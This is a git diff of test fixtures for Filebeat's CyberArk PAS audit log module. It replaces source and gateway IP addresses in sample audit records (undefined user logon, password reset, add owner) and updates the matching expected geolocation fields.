--- a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json
@@ -114,10 +114,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:43:26Z",
         "cyberarkpas.audit.issuer": "PSMAdmin",
         "cyberarkpas.audit.message": "Undefined User Logon",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:43:26</Timestamp>\n    <IsoTimestamp>2021-03-11T16:43:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PSMAdmin</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:43:26</Timestamp>\n    <IsoTimestamp>2021-03-11T16:43:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PSMAdmin</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Error",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:43:26",
         "event.action": "authentication_failure",
         "event.category": [
@@ -143,22 +143,19 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMAdmin"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -169,25 +166,22 @@
         "@timestamp": "2021-03-11T17:46:28.000Z",
         "cyberarkpas.audit.action": "Undefined User Logon",
         "cyberarkpas.audit.desc": "Undefined User Logon",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:28Z",
         "cyberarkpas.audit.issuer": "adrian",
         "cyberarkpas.audit.message": "Undefined User Logon",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>adrian</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>adrian</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:46:28",
-        "destination.address": "81.32.170.205",
-        "destination.geo.city_name": "Barcelona",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 41.3891,
-        "destination.geo.location.lon": 2.1611,
-        "destination.geo.region_iso_code": "ES-B",
-        "destination.geo.region_name": "Barcelona",
-        "destination.ip": "81.32.170.205",
+        "destination.address": "67.43.156.14",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.14",
         "event.action": "authentication_failure",
         "event.category": [
             "authentication"
@@ -205,7 +199,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2627,
+        "log.offset": 2625,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -214,7 +208,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "127.0.0.1",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "adrian"
@@ -232,22 +226,25 @@
         "@timestamp": "2021-03-14T13:28:00.000Z",
         "cyberarkpas.audit.action": "Undefined User Logon",
         "cyberarkpas.audit.desc": "Undefined User Logon",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:28:00Z",
         "cyberarkpas.audit.issuer": "testark",
         "cyberarkpas.audit.message": "Undefined User Logon",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:28:00</Timestamp>\n    <IsoTimestamp>2021-03-14T13:28:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>testark</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:28:00</Timestamp>\n    <IsoTimestamp>2021-03-14T13:28:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>testark</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Error",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 14 06:28:00",
-        "destination.address": "34.71.250.247",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "34.71.250.247",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "authentication_failure",
         "event.category": [
             "authentication"
@@ -265,7 +262,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4089,
+        "log.offset": 4085,
         "log.syslog.priority": "7",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -273,23 +270,20 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log
index 41f67cb2add0..72ee2983bf84 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
index d46cdf31a026..ed9a09a00067 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:45",
         "event.action": "reset user password detailed information",
         "event.code": "316",
@@ -29,19 +29,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
index f52711e43b99..10d4c10e429c 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
index 0d82c44a4ecd..244bebb33c9f 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:45",
         "event.action": "reset user password",
         "event.code": "317",
@@ -28,19 +28,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
index 6aee911c509f..0c69490477b2 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
@@ -1,16 +1,16 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
